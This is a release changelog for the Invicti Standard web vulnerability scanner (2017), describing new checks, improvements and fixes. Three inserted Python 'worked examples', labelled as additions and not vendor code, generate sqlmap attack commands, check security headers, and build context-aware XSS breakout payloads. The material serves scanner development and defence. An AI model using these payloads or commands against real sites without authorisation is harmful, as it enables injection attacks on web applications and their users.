Changelogs

Invicti Standard

24 Nov 2017

NEW FEATURES

  • Users can now preconfigure local/session web storage data for a website.
  • Added a new send to action to send e-mails.
  • Added HTTP Header Authentication settings to add request HTTP Headers with authentication information.
  • Added CSV file link importer.
  • Parsing of form values from a specified URL.
  • Added custom root certificate support for manual crawling.
  • Added gzipped sitemap parsing support.

NEW SECURITY CHECKS

  • Added reflected “Code Evaluation (Apache Struts 2)” security check (CVE-2017-12611).
  • Added “Remote Code Execution in Apache Struts” security check (CVE-2017-5638).

IMPROVEMENTS

  • Renamed “Important” severity name to “High”.
  • Updated external references for several vulnerabilities.
  • Improved default Form Values settings.
  • Improved scan stability and performance.
  • Added Form Authentication performance data to Scan Performance knowledgebase node.
  • Added “Run only when user is logged on” option to the scan scheduling.
  • Added a warning before the scan starts if there are out of scope links among the imported links.
  • Improved Active Mixed Content vulnerability description.
  • Improved DOM simulation for events attached to document object.
  • Added “Alternates”, “Content-Location” and “Refresh” response header parsing.
  • Removed “Disable IE ESC” requirement on Windows server operating systems.
  • Improved Content Security Policy (CSP) engine performance by checking CSP Nonce value per directory.
  • Changed sqlmap payloads to start with sqlmap.py, including the .py extension.
  • Added the --batch argument to sqlmap payloads.
  • Removed Markdown Injection XSS attack payloads.
  • Filtered out irrelevant certificates generated by Invicti from client certificate selection dropdown on Client Certificate Authentication settings.
  • Added highlighting for detected out of date JavaScript libraries.
  • Added ALL parameter type option to the Ignored Parameters settings.
  • Added gtm.js (Google Tag Manager JS library) to the default excluded scope patterns.
  • Added an option to export only PDF reports without HTML.
  • Added -nohtml argument to CLI to create only pdf reports.
  • Updated the Accept header value for default scan policy.
  • CSS exclusion selectors now support frames and iframes.
  • Added embedded space parsing for JavaScript code in HTML attribute values.
  • Added scan start time information to the dashboard.
  • Skip Phase button is disabled if the phase cannot be skipped.
  • Added validation messages for invalid entries on start new scan dialog sections.
  • Added parsing source information to Scanned URLs List and Crawled URLs List (JSON) reports.
  • Added highlight support for password transmitted over HTTP vulnerabilities.
  • Email disclosure will not be reported for email address used in form authentication credentials.
  • Added focus and blur event simulation for form authentication set value API calls.
  • Uninstaller now checks for any running instances.
  • Internal proxy now serves its certificate through an HTTP echo page.
  • Added spell checker for Report Policy Editor.
  • Added an error page if any internal proxy exception occurs.
  • Added more information about the HTML form and input for vulnerabilities found on HTML forms.
  • Added a JavaScript option to specify JavaScript cookies to persist across authentication and DOM simulation.
  • Extensions on the URLs are handled by the custom URL rewrite rule wizard.
  • Added Parameter Value column to Vulnerabilities List CSV report.
  • Added match by HTML element id for form values.
  • Added “Ignore document events” to JavaScript settings to ignore triggering events attached to document object.
  • Improved Windows Short Filename vulnerability details Remedy section.
  • Improved scan policy security check filtering by supporting short names of security checks.
  • Improved Burp file import dialog by removing the file extension filter.
  • Improved table column widths on several reports.
  • Updated default User-Agent HTTP request header string.
  • URL Rewrite parameters are now represented as asterisks in sqlmap payloads.
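
Worked example (added here; not Invicti's own command generator) of the sqlmap command shape described by the items above: sqlmap.py as the script name, --batch for unattended runs, and a '*' marker on each URL rewrite parameter, rendered with POSIX shell quoting so that double quotes and spaces in values and credentials survive. The zero-based path segment index convention, the function names and the sample request are this example's assumptions.

```python
"""Build a sqlmap command from a captured request.

Added example, not Invicti's generator. Rewrite parameters are identified
by zero-based path segment index (this example's convention); the command
is rendered for a POSIX shell with shlex quoting. Sample request below is
constructed."""
import shlex
from urllib.parse import urlsplit, urlunsplit

AUTH_TYPES = ("Basic", "Digest", "NTLM")   # values sqlmap accepts for --auth-type


def mark_rewrite_segments(url, rewrite_indexes):
    """Append sqlmap's custom injection marker '*' to each path segment in
    rewrite_indexes, e.g. /product/42/view with index 1 -> /product/42*/view."""
    parts = urlsplit(url)
    segments = parts.path.split("/")          # segments[0] is '' (leading '/')
    for idx in rewrite_indexes:
        pos = idx + 1
        if pos >= len(segments) or not segments[pos]:
            raise ValueError(f"no path segment at index {idx}")
        segments[pos] += "*"
    return urlunsplit(parts._replace(path="/".join(segments)))


def build_sqlmap_argv(url, method="GET", data=None, cookies=None,
                      headers=None, auth=None, rewrite_indexes=()):
    """Return the invocation as an argv list of unquoted tokens.
    auth is (type, user, password) with type one of AUTH_TYPES."""
    argv = ["sqlmap.py", "--batch", "-u", mark_rewrite_segments(url, rewrite_indexes)]
    if method.upper() != "GET":
        argv += ["--method", method.upper()]
    if data:
        argv += ["--data", data]
    if cookies:
        argv += ["--cookie", "; ".join(f"{k}={v}" for k, v in cookies.items())]
    for name, value in (headers or {}).items():
        argv += ["-H", f"{name}: {value}"]
    if auth:
        auth_type, user, password = auth
        if auth_type not in AUTH_TYPES:
            raise ValueError(f"unsupported auth type {auth_type!r}")
        argv += ["--auth-type", auth_type, "--auth-cred", f"{user}:{password}"]
    return argv


def render_command(argv):
    """Quote every token for a POSIX shell. shlex.quote wraps anything
    containing double quotes, spaces or metacharacters in single quotes, so
    a credential such as p"w d survives intact."""
    return " ".join(shlex.quote(tok) for tok in argv)


# Constructed sample: a POST to a rewritten URL behind NTLM authentication.
SAMPLE = dict(
    url="https://target.example/product/42/view",
    method="POST",
    data='q=a"b',
    cookies={"session": "9a1c"},
    headers={"X-Requested-With": "XMLHttpRequest"},
    auth=("NTLM", "corp\\bob", 'p"w d'),
    rewrite_indexes=(1,),
)

if __name__ == "__main__":
    print(render_command(build_sqlmap_argv(**SAMPLE)))
```

The argv list is kept separate from the rendered string so the same tokens can be passed straight to a process spawner without going through a shell at all; the shell rendering exists only for copy-and-paste.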

FIXES

  • Fixed the InvalidOperationException on application exit.
  • Fixed CSRF vulnerability reporting on change password forms.
  • Fixed Email Disclosure highlight issue where only the first email address is highlighted when there are multiple email addresses on the page.
  • Fixed case sensitivity while matching ignored parameters; matching is now case-sensitive.
  • Fixed the incorrect progress bar value displayed when a scan is imported.
  • Fixed the incorrect disabled external references section in WordPress Setup Configuration File template.
  • Fixed up/down movement issue on Form Values when multiple rows are selected.
  • Fixed various source code disclosure issues.
  • Fixed an escaping issue with CSS exclusion selectors.
  • Fixed the issue where the basic authentication credentials are not being sent on logout detection phase.
  • Fixed a NullReferenceException when an invalid raw request is entered in request builder.
  • Fixed HTTP Request Builder where it does not set request method to POST if the selected method is PUT.
  • Fixed the issue where the response URL is displayed in the vulnerability details.
  • Fixed the issue where some links were not excluded from scan from sitemap.
  • Fixed the issue where a security check group appeared enabled although all security checks within it were disabled.
  • Fixed a random DOM simulation exception that occurred when the site created popup windows.
  • Fixed a RemotingException that occurred on Form Authentication Verifier.
  • Fixed a possible NullReferenceException on Form Authentication.
  • Fixed the message dialog windows displayed by the 3rd party component on Form Authentication Verification.
  • Fixed the broken form authentication custom script when the last line of the script is a single line comment.
  • Fixed certificate store search by subject name returning matches whose subject names were not exact.
  • Fixed ESC key handling on message dialogs.
  • Fixed huge parameter value deserialization memory usage.
  • Fixed an issue with Load New License occurs when the source and destination license files are same.
  • Fixed the issue where the parsing source is set to Unspecified for links found by resource finder in reports.
  • Fixed the incorrect sitemap representation of excluded nodes when a scan is imported.
  • Fixed incorrect URLs that consisted only of an extension being added.
  • Fixed the logout detection portion of form authentication verification where it was not using the configured proxy.
  • Fixed the message overflow issue in the out of scope link warning dialog.
  • Fixed a NullReferenceException which may be thrown while importing a swagger file.
  • Fixed the incorrect Skip Current Phase button state when the scan phase is changed.
  • Fixed the internal proxy throwing an exception when certain browsers do not send the full URL with the initial request.
  • Fixed an issue in which the form authentication is not being triggered on retest.
  • Fixed StackOverflowException in swagger parser thrown while parsing objects containing circular references.
  • Fixed a swagger file parsing issue where target URL should be used when host field is missing.
  • Fixed swagger importer by ignoring any metadata properties.
  • Fixed the empty request/response displayed for some sitemap nodes with 404 response.
  • Fixed the autocomplete issue for the Content-Type header in Request Builder.
  • Fixed a NullReferenceException that occurred during DOM simulation.
  • Fixed the incorrect URLs parsed on attack responses.
  • Fixed the redundant duplicate HTTP requests issued by Web App Fingerprinter.
  • Fixed show/hide issue for Dashboard and Sitemap panels.
  • Fixed the issue where Retest All button disappears after a Retest.
  • Fixed the issue where the dollar sign in imported URL is encoded after scan.
  • Fixed the empty request/response header issue for links discovered during attacking.
  • Fixed ignore parameter issue for parameters containing special characters.
  • Fixed a NullReferenceException that occurs for select elements missing option elements on multipart requests.
  • Fixed missing vulnerabilities requiring late confirmation for incremental scans.
  • Fixed a NullReferenceException that may occur on iframe security checks.
  • Fixed the exception that occurs while adding duplicate POST parameters with the same name in Request builder.

21 Nov 2017

NEW SECURITY CHECK

  • Added more Command Injection and Blind Command Injection patterns for Windows systems.

11 Oct 2017

IMPROVEMENT

  • Updated vulnerability database to latest version.

09 Oct 2017

FIX

  • Fixed the incorrect percentage encoding on Detailed Scan Report template.

06 Oct 2017

NEW SECURITY CHECK

  • Added “Out of Band Code Evaluation (Apache Struts 2)” security check (CVE-2017-12611).

IMPROVEMENTS

  • Improved the stability of DOM and JavaScript simulation.
  • Improved report templates.

22 Sep 2017

NEW SECURITY CHECK

  • Added “Out of Band Code Evaluation (Apache Struts 2)” security check (CVE-2017-9805).

18 Sep 2017

FIX

  • Fixed an out of memory issue.

13 Sep 2017

IMPROVEMENTS

  • Improved the form authentication element click API by providing the mouse coordinates.

FIXES

  • Fixed an object leak causing performance issues during scans.
  • Fixed a backup file check where scan policy selections were not honoured.
  • Fixed the broken Basic, NTLM/Kerberos “Test Credentials” button.
  • Fixed the unencrypted credentials saved with profile files.
  • Fixed the JavaScript parsing issue by checking the mime type of the script tags.
  • Fixed the broken email disclosure detection which was not able to match multiple emails.
  • Fixed incorrect link parsing on JavaScript source map files.

24 Aug 2017

NEW FEATURES

  • New Basic, NTLM, Digest and Kerberos authentication settings to support multiple credentials for different URL paths.

NEW SECURITY CHECKS

  • Checks for default pages of IIS 10.0, 8.5, 7.5, 7.0 web servers.
  • Checks for WordPress Setup Configuration File.
  • Remote Code Execution checks for Node.js on Windows.

IMPROVEMENTS

  • Improved Local File Inclusion (LFI) attack patterns.
  • Improved DOM XSS attack patterns.
  • Improved Blind Command Injection detection on Linux systems.
  • Added response compression and length information to HTTP Request Builder.
  • Displaying times in 24-hour format on scan reports.
  • Improved DOM/JavaScript simulation.
  • Improved the performance of email address disclosure detection.
  • Improved the performance of database connection string disclosure detection.
  • Improved the performance of JavaScript library detection.
  • Improved the performance of RoR database configuration detection.
  • Improved “Enter Links” dialog by adding format selection for all the supported import formats.
  • Added parameter type information to nodes on “Issues” panel.
  • Improved scan import performance significantly.
  • Added context menu item for sitemap root node to open the scan folder.
  • Improved resource finder to find more hidden resources.
  • Time zone information added to reports.
  • Improved support for simulating customized select elements.
  • Improved NTLM, Digest and Kerberos authentication support.
  • Improved DOM simulation stability and performance.
  • Added the list of URLs that do not match the rewrite rules on URL Rewrite knowledge base.
  • Added number of links that match to a URL Rewrite rule on URL Rewrite knowledge base.
  • Added out of scope links count information to the knowledge base.
  • Improved the default parameter name list for Parameter Based Navigation.
  • Added NTLM and Digest authentication support to the generated sqlmap and cURL commands.
  • Improved boolean and blind SQL injection checks for MySQL databases.
  • Improved blind SQL injection checks for PostgreSQL databases.
  • Added excluded URLs list to the detailed scan report.
  • Improved reflected and stored XSS detection.
  • HSTS checks now report a missing preload directive.
  • Updated Korean translation.
  • Added XML report types for Crawled URLs List and Scanned URLs List reports.
  • Added toolbar to open and copy URLs for Browser View tab.
  • Improved JSON response parsing.
  • Improved DOM based XSS payloads by prepending a URL to the referer payload so that it actually works in web browsers.
  • Improved email disclosure checks by checking host names against the public suffix list.

FIXES

  • Fixed the error caused by null bytes in attack patterns while sending vulnerabilities to JIRA.
  • Fixed an incorrect “Password Transmitted over HTTP” issue for relative URLs on pages redirected to HTTPS addresses.
  • Fixed the NullReferenceException thrown while importing certain HAR (HTTP Archive) files.
  • Fixed the missing activities while performing a controlled scan.
  • Fixed the missing DOM parsing activity when “Override Target URL with authenticated page” option is selected.
  • Fixed the incorrect total security check count while performing controlled scans on activity list.
  • Fixed incorrect “Interesting Header” report for Content-Security-Policy header.
  • Fixed the redundant extra headers added to requests while using request builder.
  • Fixed the disabled “Start Proxy” button when Invicti is opened after an application crash.
  • Fixed the issue where directory listing was not reported on some IIS versions.
  • Fixed page break issues on reports.
  • Fixed the issue where comments in CSS files are not parsed.
  • Fixed the incorrect URL found in CSS comments.
  • Fixed incorrect CSRF vulnerability reports by taking hidden token input into account.
  • Fixed an IndexOutOfRangeException caused by CSP checks.
  • Fixed the signature pattern which fails to match “Programming Error Message (PHP)” in multiple lines.
  • Fixed markdown XSS attack patterns causing incorrect findings.
  • Fixed the double quote encoding issue on generated sqlmap commands.
  • Fixed incorrect “Interesting Header” reports for some headers.
  • Fixed the incorrect http protocol displayed for SSL vulnerabilities.
  • Fixed the duplicate delete confirmation message while deleting the scan and report policies using a keyboard shortcut.
  • Fixed an issue where DOM simulation is performed for checking XSS once per XPath.
  • Fixed the incorrect progress report during controlled scans.
  • Fixed the encoding issue on reported DOM XSS stack traces.
  • Fixed the highlighting issue of multiple custom data reported on vulnerabilities.
  • Fixed the incorrect rows deleted issue when multiple rows are selected on imported links section.
  • Fixed the incorrect behaviour of move up/down controls on custom URL rewrite section.
  • Fixed the maximum crawled URL limit exceeded issue.
  • Fixed duplicate resource finder requests.
  • Fixed CSS escaping in CSS selector generation.
  • Fixed the failing error report when the unexpected exception title is too long.
  • Fixed the WADL import issue where the operation fails for responses with no status codes.
  • Fixed incorrect missing-HttpOnly reports for XSRF-TOKEN cookies; by design these cookies must be readable from JavaScript code.
  • Fixed incorrect cURL and sqlmap commands when basic authentication is used.
  • Fixed the incorrect missing object-src report on CSP checks.
  • Fixed an issue where the default crawled value was double-encoded instead of single-encoded.
  • Fixed the problem where the unique links added twice while importing Postman files.
  • Fixed the “Property set method not found” error that occurs while using the FogBugz send to action.
  • Fixed the missing content for Site Profile section of Knowledge Base report.
  • Fixed “The selected task no longer exists.” error when trying to run a scheduled scan on some Windows machines.
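
Worked example (added here; not Invicti's check code) of the three header-check rules touched in this entry: an HSTS policy eligible for preloading needs a max-age of at least one year, includeSubDomains and preload; object-src inherits from default-src, so a missing object-src is only reported when neither is set; and XSRF-TOKEN cookies are exempt from the HttpOnly check because the double-submit CSRF pattern requires JavaScript to read them. The one-year threshold is the current hstspreload.org submission requirement; the cookie exemption list, the function names and the sample headers are this example's assumptions.

```python
"""Response header checks: HSTS preload directives, CSP object-src fallback,
and the HttpOnly exemption for XSRF-TOKEN cookies.

Added example, not Invicti's check code. Sample headers are constructed."""

PRELOAD_MIN_MAX_AGE = 31536000  # one year, current hstspreload.org requirement
# Cookies that must be readable from JavaScript by design (double-submit
# CSRF token pattern). Assumption: extend with the names your applications use.
JS_READABLE_CSRF_COOKIES = {"xsrf-token"}


def parse_directives(value):
    """Map ';'-separated directives to lower-cased name -> value; bare
    tokens (includeSubDomains, preload, HttpOnly) map to True."""
    out = {}
    for part in value.split(";"):
        part = part.strip()
        if part:
            name, has_value, val = part.partition("=")
            out[name.strip().lower()] = val.strip() if has_value else True
    return out


def check_hsts(value):
    """Findings for a Strict-Transport-Security value."""
    d = parse_directives(value)
    findings = []
    max_age = d.get("max-age")
    if not isinstance(max_age, str) or not max_age.isdigit():
        findings.append("missing or invalid max-age")
    elif int(max_age) < PRELOAD_MIN_MAX_AGE:
        findings.append("max-age shorter than one year")
    if "includesubdomains" not in d:
        findings.append("missing includeSubDomains")
    if "preload" not in d:
        findings.append("missing preload directive")
    return findings


def check_csp(policy):
    """Findings for a Content-Security-Policy value. object-src inherits
    from default-src, so 'missing object-src' is only reported when neither
    is present; the first occurrence of a directive wins, as in browsers."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    if "object-src" in directives:
        origin = "object-src"
    elif "default-src" in directives:
        origin = "default-src"
    else:
        return ["missing object-src (and no default-src to fall back to)"]
    if [s.lower() for s in directives[origin]] != ["'none'"]:
        return [f"{origin} permits plugin content; set object-src 'none'"]
    return []


def check_set_cookie(header):
    """Findings for one Set-Cookie value: missing HttpOnly (except for
    cookies JavaScript must read) and missing Secure."""
    name_value, _, attrs = header.partition(";")
    name = name_value.partition("=")[0].strip()
    d = parse_directives(attrs)
    findings = []
    if "httponly" not in d and name.lower() not in JS_READABLE_CSRF_COOKIES:
        findings.append(f"{name}: missing HttpOnly")
    if "secure" not in d:
        findings.append(f"{name}: missing Secure")
    return findings


def check_response(headers):
    """headers: list of (name, value) pairs; returns all findings in order."""
    findings = []
    for name, value in headers:
        key = name.lower()
        if key == "strict-transport-security":
            findings += check_hsts(value)
        elif key == "content-security-policy":
            findings += check_csp(value)
        elif key == "set-cookie":
            findings += check_set_cookie(value)
    return findings


# Constructed sample response headers.
SAMPLE_HEADERS = [
    ("Strict-Transport-Security", "max-age=300"),
    ("Content-Security-Policy", "default-src 'self'; script-src 'self'"),
    ("Set-Cookie", "XSRF-TOKEN=7d9e; Path=/; Secure"),
    ("Set-Cookie", "sessionid=9a1c; Path=/"),
]

if __name__ == "__main__":
    for finding in check_response(SAMPLE_HEADERS):
        print(finding)
```

Note that the CSP rule reports the directive the effective value came from, so a policy with only default-src 'self' is flagged as default-src permitting plugin content rather than as a missing object-src, which is what the fix above corrects.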

19 Jul 2017

IMPROVEMENTS

  • Enhanced and fixed several DOM simulations.
  • Removed redundant SSL logs caused by HSTS security checks.
  • Improved localization capabilities of Report Policy Editor.

14 Jun 2017

NEW FEATURES

  • Manual Crawling (Proxy Mode) now supports protocols like TLS 1.1 and 1.2.
  • Added scan policy settings for CSRF security checks.
  • Added ability to use custom HTTP headers during scan.
  • Added element exclusion support using CSS query selectors for DOM/JavaScript simulation.
  • Added /generatereport CLI argument for report generation from scan session files.
  • Added hex editor view for requests on request builder.
  • Added attacking optimization option for recurring parameters on different pages.
  • Added a new knowledgebase item called Site Profile that lists information about target web site such as the web server operating system, database server, JavaScript libraries used etc.

NEW SECURITY CHECKS

  • Added Referrer Policy security checks.
  • Added markdown injection XSS patterns.
  • Added HostIP and IPv6 patterns to MySQL and SSH SSRF security checks.
  • Added Database Name Disclosure security checks for MS SQL and MySQL.
  • Added Out of Date security checks for several JavaScript libraries.
  • Added Remote Code Evaluation (Node.js) security checks.
  • Added SSRF detection with server-status.
  • Added user controllable cookie detection.
  • Added Context-Aware XSS detection by generating XSS payloads based on the reflected context without breaking it.

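
Worked example (added here; not Invicti's scanner code) of the context-aware approach from the last item: reflect a canary, classify where each copy landed (text node, quoted or unquoted attribute value, JS string, JS code, HTML comment) and choose a payload that closes that context instead of breaking the surrounding markup. The canary, the context names, the payload table, the function names and the sample page are this example's own assumptions; the JS tokenizer ignores comments and regex literals.

```python
"""Context-aware reflected XSS probing.

Added example, not Invicti's scanner code. Inject a canary, find every
reflection, classify its context and pick a payload that fits it."""

CANARY = "nspcanary"   # constructed; a real scanner uses a random token per request
PROBE = "alert(1)"     # JavaScript that signals execution

PAYLOADS = {
    "html_text":     f"<img src=x onerror={PROBE}>",
    "html_comment":  f"--><img src=x onerror={PROBE}><!--",
    "attr_dq":       f'x" autofocus onfocus="{PROBE}',   # existing closing quote reused
    "attr_sq":       f"x' autofocus onfocus='{PROBE}",
    "attr_unquoted": f"x autofocus onfocus={PROBE}",
    "tag":           f"autofocus onfocus={PROBE}",       # reflected as an attribute name
    "js_string_dq":  f'"+{PROBE}+"',                     # keeps the string expression valid
    "js_string_sq":  f"'+{PROBE}+'",
    "js_template":   "${" + PROBE + "}",
    "js_code":       f"1;{PROBE};//",
}


def attr_state(tag):
    """State inside an open tag (from '<' up to the reflection): which
    quote, if any, is open for the current attribute value."""
    quote, after_eq = None, False
    for ch in tag:
        if quote:
            if ch == quote:
                quote, after_eq = None, False
        elif after_eq:
            if ch in "\"'":
                quote = ch
            elif ch.isspace():
                after_eq = False
        elif ch == "=":
            after_eq = True
    if quote == '"':
        return "attr_dq"
    if quote == "'":
        return "attr_sq"
    return "attr_unquoted" if after_eq else "tag"


def js_string_state(js):
    """Which JS string literal, if any, is open at the end of js.
    Handles backslash escapes; ignores comments and regex literals."""
    quote, i = None, 0
    while i < len(js):
        ch = js[i]
        if quote:
            if ch == "\\":
                i += 1            # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "\"'`":
            quote = ch
        i += 1
    return {'"': "js_string_dq", "'": "js_string_sq",
            "`": "js_template", None: "js_code"}[quote]


def classify(body, pos):
    """Context of the reflection starting at body[pos]."""
    before = body[:pos]
    lower = before.lower()
    open_script, close_script = lower.rfind("<script"), lower.rfind("</script")
    if open_script > close_script:
        gt = before.find(">", open_script)
        if gt < 0:                          # still inside the <script ...> tag itself
            return attr_state(before[open_script:])
        return js_string_state(before[gt + 1:])
    if before.rfind("<!--") > before.rfind("-->"):
        return "html_comment"
    if before.rfind("<") > before.rfind(">"):
        return attr_state(before[before.rfind("<"):])
    return "html_text"


def reflections(body, canary=CANARY):
    """[(offset, context, payload)] for every reflection of canary."""
    out, start = [], 0
    while (pos := body.find(canary, start)) >= 0:
        ctx = classify(body, pos)
        out.append((pos, ctx, PAYLOADS[ctx]))
        start = pos + len(canary)
    return out


# Constructed response page reflecting the canary in six contexts.
SAMPLE_PAGE = (
    "<html><body>\n"
    f"<p>Results for {CANARY}</p>\n"
    f'<input name="q" value="{CANARY}">\n'
    f"<a href='/search?q={CANARY}'>again</a>\n"
    f'<script>var q = "{CANARY}"; var n = {CANARY};</script>\n'
    f"<!-- debug: {CANARY} -->\n"
    "</body></html>"
)

if __name__ == "__main__":
    for offset, ctx, payload in reflections(SAMPLE_PAGE):
        print(f"{offset:4d}  {ctx:14s}  {payload}")
```

Each payload leaves the document well-formed: the attribute payloads end on an opening quote that pairs with the quote already closing the value, and the JS string payloads keep the original literal syntactically valid, which is what lets the probe execute even when the application's own closing markup would otherwise swallow a naive breakout.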
IMPROVEMENTS

  • Updated the links to several external references.
  • Added cancellation of ongoing attack activities when excluded from site map.
  • Improved JavaScript and CSS resource parsing.
  • Added exploitation for XXE vulnerabilities.
  • Added DOM simulation options to scan policy optimizer wizard.
  • Improved Mixed Content vulnerability reporting by separating them according to resource types.
  • Improved the CSS query selector generation on form authentication custom script dialog.
  • Improved boolean SQL injection detection for redirect responses.
  • Improved WSDL parsing for files that contain optional extensions.
  • Added current scan profile, scan policy and report policy names to status bar.
  • Improved .sql file detection signature.
  • Improved the highlighting of patterns on HTTP responses.
  • Added extra confirmation for weak credentials detection.
  • Added POST parameters to crawling activities on scan activity list.
  • Added scan policy option to allow XHR requests during DOM simulation.
  • Added response statistics to request builder.
  • Added form value for password input types to default scan policy.
  • Added status column to the request history in request builder.
  • Increased the maximum response size limit for JavaScript resources.
  • Improved the send to JIRA error message.
  • Added maximum number of option elements per select element to simulate scan policy setting.
  • Added a “Filter colon events” scan policy option to skip events whose names contain a colon character during DOM simulation.
  • Improved error based SQLi exploitation by generating prefix/suffix dynamically.
  • Improved command injection vulnerability detection by prepending original parameter value to attack payload.
  • Improved LFI vulnerability detection by detecting HTML and URL encoded PHP source codes.

FIXES

  • Fixed the incorrect imported link count when search panel is active on the grid view.
  • Fixed the “Open in Browser” context menu action broken for root nodes on site map.
  • Fixed the undefined password value issue on form authentication custom script dialog.
  • Fixed an issue where error based SQLi confirmation is done based on the first seen database signature when multiple signatures appear in source code.
  • Fixed the duplicate import link issue.
  • Fixed request builder issues on parsing query string and encoding.
  • Fixed a request builder issue where the error dialog should not be shown while switching tabs if the raw request is empty.
  • Fixed an issue where XSS is missed when injected payload is not executed due to a syntax error.
  • Fixed the broken custom cookie issue where the custom cookie is not sent for imported scan files.
  • Fixed crawling of URLs on pages where base element points to some other URL.
  • Fixed some missing vulnerabilities on site map.
  • Fixed the slow performing certificate load operation on start new scan dialog.
  • Fixed the incorrect vulnerability severity counts on bar chart and status bar.
  • Fixed an issue where blacklisted Invicti attack payloads prevented further source code disclosure findings in HTML responses.
  • Fixed the splash screen which stays open when Invicti is started from command line.
  • Fixed the focus stealing issue when HTML response contains the autofocus attribute.
  • Fixed an issue where mixed content vulnerabilities are missing because DOM simulation is skipped due to missing JavaScript in HTML source.
  • Fixed missing response on request builder when the request is loaded from history list.
  • Fixed issues where empty POST parameter is imported and headers added as disabled for Postman files.
  • Fixed an issue where signature fails to match MS SQL username in error messages.
  • Fixed an issue where a vulnerability was missed because an arbitrary value was not appended to the extra query string parameter name.

06 Apr 2017

NEW SECURITY CHECK

  • Added new vulnerability checks for Apache Struts framework vulnerabilities.

IMPROVEMENTS

  • Added JSON format option for “Crawled URL(s) List”, “Scanned URL(s) List” and “Vulnerabilities List” report templates.
  • Improved Blind SQL Injection detection for MySQL databases.

FIXES

  • Fixed the incorrect weak signature algorithms reported for root certificates.
  • Fixed the broken editing capabilities on report policy editor.
  • Fixed the empty activity list issue during scans.
  • Fixed the missing custom cookie issue on imported scans.